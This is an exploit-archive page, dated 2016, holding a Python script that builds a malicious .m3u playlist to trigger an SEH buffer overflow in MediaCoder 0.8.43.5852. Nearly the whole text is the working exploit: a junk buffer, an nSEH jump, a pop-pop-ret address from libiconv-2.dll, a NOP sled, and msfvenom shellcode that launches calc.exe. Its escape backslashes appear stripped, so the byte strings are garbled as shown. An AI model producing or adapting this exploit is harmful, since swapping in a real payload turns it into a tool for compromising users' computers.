Home / os / winmobile

MediaCoder 0.8.43.5852 SEH Overflow

Posted on 26 July 2016

# Exploit Title: [MediaCoder 0.8.43.5852 - .m3u SEH Exploit] # Exploit Author: [Karn Ganeshen] # Vendor Homepage: [http://www.mediacoderhq.com] # Download link: [http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.45.5852.exe] # Version: [Current version 0.8.43.58.52] # Tested on: [Windows Vista SP2] # #!/usr/bin/python total_buf = 5000 # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/alpha_upper -b 'x00x0ax0dxff' -f c # Payload size: 455 bytes shellcode = ("x89xe1xdaxccxd9x71xf4x5ex56x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx4dx38x4cx42x55x50" "x45x50x35x50x53x50x4cx49x4bx55x46x51x59x50x55" "x34x4cx4bx30x50x56x50x4cx4bx31x42x54x4cx4cx4b" "x46x32x44x54x4cx4bx32x52x47x58x34x4fx58x37x50" "x4ax47x56x50x31x4bx4fx4ex4cx37x4cx43x51x53x4c" "x53x32x36x4cx51x30x59x51x58x4fx34x4dx35x51x48" "x47x4ax42x5ax52x36x32x46x37x4cx4bx56x32x52x30" "x4cx4bx50x4ax57x4cx4cx4bx50x4cx52x31x32x58x4d" "x33x30x48x33x31x38x51x46x31x4cx4bx50x59x31x30" "x33x31x49x43x4cx4bx30x49x55x48x5ax43x36x5ax47" "x39x4cx4bx30x34x4cx4bx45x51x39x46x36x51x4bx4f" "x4ex4cx59x51x48x4fx44x4dx53x31x58x47x56x58x4d" "x30x33x45x4bx46x54x43x43x4dx4cx38x47x4bx53x4d" "x37x54x54x35x5ax44x51x48x4cx4bx30x58x57x54x35" "x51x4ex33x55x36x4cx4bx54x4cx30x4bx4cx4bx56x38" "x45x4cx43x31x58x53x4cx4bx55x54x4cx4bx35x51x48" "x50x4bx39x51x54x56x44x46x44x51x4bx31x4bx43x51" "x46x39x30x5ax46x31x4bx4fx4dx30x51x4fx51x4fx31" "x4ax4cx4bx52x32x4ax4bx4cx4dx51x4dx52x4ax43x31" "x4cx4dx4cx45x4fx42x43x30x55x50x33x30x30x50x33" "x58x56x51x4cx4bx32x4fx4dx57x4bx4fx48x55x4fx4b" "x4ax50x38x35x4ex42x31x46x53x58x49x36x5ax35x4f" "x4dx4dx4dx4bx4fx4ex35x47x4cx43x36x33x4cx35x5a" "x4bx30x4bx4bx4dx30x44x35x33x35x4fx4bx31x57x44" "x53x52x52x52x4fx33x5ax33x30x36x33x4bx4fx58x55" "x42x43x45x31x52x4cx35x33x56x4ex55x35x54x38x32" "x45x53x30x41x41") junk = "http:// " junk += "A"*784 nseh = "xEBx06x90x90" seh = "x38x78x01x66" # PPR - 0x66017838 - libiconv-2.dll evil = junk + nseh + seh evil += "x90"*50 + shellcode evil += "x90"*3000 file = open("evil.m3u", "wb") file.write (evil) file.close()

 

TOP